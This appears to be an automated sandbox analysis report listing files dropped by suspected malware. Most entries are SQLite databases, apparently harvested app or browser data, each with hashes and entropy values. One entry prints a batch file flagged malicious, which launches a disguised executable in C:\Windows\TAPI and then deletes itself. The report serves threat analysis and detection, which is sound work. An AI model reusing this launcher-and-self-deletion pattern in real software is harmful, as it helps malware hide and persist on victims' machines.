                                                                                                                                                                        Entropy (8bit):0.037963276276857943
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                                                                                                        MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                                                                                                        SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                                                                                                                        SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                                                                                                                        SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                                                                                                        Malicious:false
Preview:SQLite format 3...
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
Preview:SQLite format 3...
                                                                                                                                                                        Process:C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe
                                                                                                                                                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):160
                                                                                                                                                                        Entropy (8bit):5.369230066114363
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9mV8H1QLNSBktKcKZG1t+kiE2J5xAIgmK:hCRLuVFOOr+DEYesKOZG1wkn23fE
                                                                                                                                                                        MD5:E0D637F8AF09F33F1D5948B4C8A5F538
                                                                                                                                                                        SHA1:085BD3A2851AFF19EE5458A9ACB2438B2074737C
                                                                                                                                                                        SHA-256:7170FAA3EDFDBC5C128CDDDB625CF8DCA3A98BF2B32CF301E6506CFA18A9F9E7
                                                                                                                                                                        SHA-512:56D45FC21545634BE23554A2D9C2ECB9E8414969919F72D4071A0E5C11ADFB1F8B240CA89DF1EA9234DC511FBFF7C498D8A929C456A016780C892A17831014C3
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                        Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Windows\TAPI\ZWgKQlTqcrSB.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\UV4iXMFwPx.bat"
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):28672
                                                                                                                                                                        Entropy (8bit):2.5793180405395284
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):159744
                                                                                                                                                                        Entropy (8bit):0.7873599747470391
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                        MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                        SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                        SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                        SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):49152
                                                                                                                                                                        Entropy (8bit):0.8180424350137764
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5712781801655107
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):98304
                                                                                                                                                                        Entropy (8bit):0.08235737944063153
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                        MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                        SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                        SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                        SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):49152
                                                                                                                                                                        Entropy (8bit):0.8180424350137764
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):28672
                                                                                                                                                                        Entropy (8bit):2.5793180405395284
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):159744
                                                                                                                                                                        Entropy (8bit):0.7873599747470391
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                        MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                        SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                        SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                        SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5712781801655107
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):159744
                                                                                                                                                                        Entropy (8bit):0.7873599747470391
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                        MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                        SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                        SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                        SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@
                                                                                                                                                                        Process:C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe
                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):25
                                                                                                                                                                        Entropy (8bit):4.163856189774724
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:JXAiY+In:JXAiY+I
                                                                                                                                                                        MD5:5200F8FDF5D493F83438B69F1259E6B7
                                                                                                                                                                        SHA1:CBB0F228535B2C6C4D412748E672B57553A24CDA
                                                                                                                                                                        SHA-256:F356E4F6116A177F6A22168C566E5DE587AC3D51778AAB603E1710747D7E0BF9
                                                                                                                                                                        SHA-512:8DF044793827DB99959FC6D8FBC4B5ED1B3FAB7DAB04E71929DFA3E20EC54318788464386D2C1EFCFFD034747423180BB5B6AED894282D9B2CB80BBD57FCEB79
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:Nc3VRR2SBMVwvahDS0iBiQbcz
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):126976
                                                                                                                                                                        Entropy (8bit):0.47147045728725767
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                        MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                        SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                        SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                        SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):159744
                                                                                                                                                                        Entropy (8bit):0.7873599747470391
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                        MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                        SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                        SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                        SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5712781801655107
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5707520969659783
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
